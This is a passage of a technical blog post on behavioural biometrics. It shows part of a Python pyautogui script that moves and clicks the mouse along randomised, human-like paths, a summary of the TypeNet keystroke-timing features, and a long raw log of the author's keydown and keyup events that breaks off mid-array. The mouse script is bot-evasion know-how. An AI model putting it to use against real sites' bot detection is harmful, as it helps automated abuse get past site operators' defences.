<span class="n">shape</span> <span class="o">=</span> <span class="n">pyautogui</span><span class="o">.</span><span class="n">size</span><span class="p">()</span>
<span class="n">cnt</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">randX</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">max_dist</span><span class="p">)</span>
<span class="n">randY</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">max_dist</span><span class="p">)</span>
<span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
<span class="n">randX</span> <span class="o">*=</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
<span class="n">randY</span> <span class="o">*=</span> <span class="o">-</span><span class="mi">1</span>
<span class="k">if</span> <span class="n">x</span> <span class="o">+</span> <span class="n">randX</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">shape</span><span class="o">.</span><span class="n">width</span><span class="p">)</span> <span class="ow">and</span> <span class="n">y</span> <span class="o">+</span> <span class="n">randY</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">shape</span><span class="o">.</span><span class="n">height</span><span class="p">):</span>
<span class="k">return</span> <span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">randX</span><span class="p">,</span> <span class="n">y</span> <span class="o">+</span> <span class="n">randY</span><span class="p">)</span>
<span class="n">cnt</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">cnt</span> <span class="o">></span> <span class="mi">15</span><span class="p">:</span>
<span class="k">return</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">humanMove</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Moves like a human to the coordinate (x, y) and </span>
<span class="sd"> clicks on the coordinate.</span>
<span class="sd"> Randomizes move time and the move type.</span>
<span class="sd"> Visits one intermediate coordiante close to the target before</span>
<span class="sd"> fine correcting and clicking on the target coordinates.</span>
<span class="sd"> """</span>
<span class="n">close_x</span><span class="p">,</span> <span class="n">close_y</span> <span class="o">=</span> <span class="n">someWhereRandomClose</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
<span class="c1"># move to an intermediate target close to the destination</span>
<span class="c1"># start fast, end slow</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">moveTo</span><span class="p">(</span><span class="n">close_x</span><span class="p">,</span> <span class="n">close_y</span><span class="p">,</span> <span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.19</span><span class="p">,</span> <span class="mf">.75</span><span class="p">),</span> <span class="n">pyautogui</span><span class="o">.</span><span class="n">easeOutQuad</span><span class="p">)</span>
<span class="c1"># click on the main target</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">moveTo</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">.65</span><span class="p">))</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">click</span><span class="p">()</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">800</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">800</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">1000</span><span class="p">,</span> <span class="mi">600</span><span class="p">)</span>
</code></pre></div>
<p>And what is the most important statement from the <strong>TypeNet: Deep Learning Keystroke Biometrics</strong> paper?</p>
<p>Honestly, this paper was hard to understand, since it discusses a lot of the technical aspects such as the ideal ML architecture and the best loss function such as <em>Contrastive loss</em>, <em>Triplet loss</em> or <em>Softmax loss</em>. </p>
<p>But in my opinion, the graphic below explains the most relevant aspect that matters to this blog post's purpose.</p>
<figure>
<img src="https://incolumitas.com/images/key-features.png" alt="Mouse Movement Speed Profile" />
<figcaption>Image taken from the TypeNet paper: Fig. 1. Example of the 4 temporal features extracted between two consecutive keys: Hold Latency (HL), Inter-key Latency (IL), Press Latency
(PL), and Release Latency (RL).<span style="font-size: 60%"></span></figcaption>
</figure>
<p>There are four different temporal latencies that can be collected from free-text typing recordings:</p>
<ol>
<li>Hold Latency (HL)</li>
<li>Inter-key Latency (IL)</li>
<li>Press Latency(PL)</li>
<li>Release Latency (RL)</li>
</ol>
<p>The idea is that those four features bear biometric information about the person that types them.</p>
<p>Of course, in order to record those features, you must be able to listen to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keyup_event">keyup</a> events, as it is the case with JavaScript in modern web browsers.</p>
<p>How does human typing in terms of <code>keydown</code> and <code>keyup</code> event actually look like? I recorded those events while typing the text <em>I am currently listening to "Nothing around us" from Mathame</em> and attached and absolute timestamp with <code>performance.now()</code> and this is what I got:</p>
<div class="highlight"><pre><span></span><code><span class="p">[[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1798.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"I"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1876.685</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1989.15</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2012.43</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2092.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2189.04</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2252.575</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2308.535</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyC"</span><span class="p">,</span><span class="s2">"c"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2388.77</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2468.72</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyC"</span><span class="p">,</span><span class="s2">"c"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2508.44</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2508.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2612.755</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2684.54</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2764.705</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2796.895</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2900.51</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2916.865</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2924.835</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3020.795</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3076.53</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3085.245</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3158.005</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3196.57</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyY"</span><span class="p">,</span><span class="s2">"y"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3277.11</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3364.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyY"</span><span class="p">,</span><span class="s2">"y"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3405.69</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3460.55</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3812.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3813.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3868.56</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyL"</span><span class="p">,</span><span class="s2">"l"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3868.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3916.83</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3917.06</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4005.345</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4005.59</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4006.31</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4006.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4093.055</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4093.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4124.945</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4125.22</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4205.245</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4205.5</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4228.57</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4228.805</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4292.885</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4293.13</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4356.695</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4356.945</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4428.73</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4428.94</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4452.825</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4453.04</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4573.065</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4573.295</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4628.565</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4628.78</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4660.975</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4661.235</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4716.515</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4716.765</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4732.9</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4733.135</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4796.565</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4796.795</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4836.63</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">4836.865</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5133.195</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5133.39</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5228.89</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span 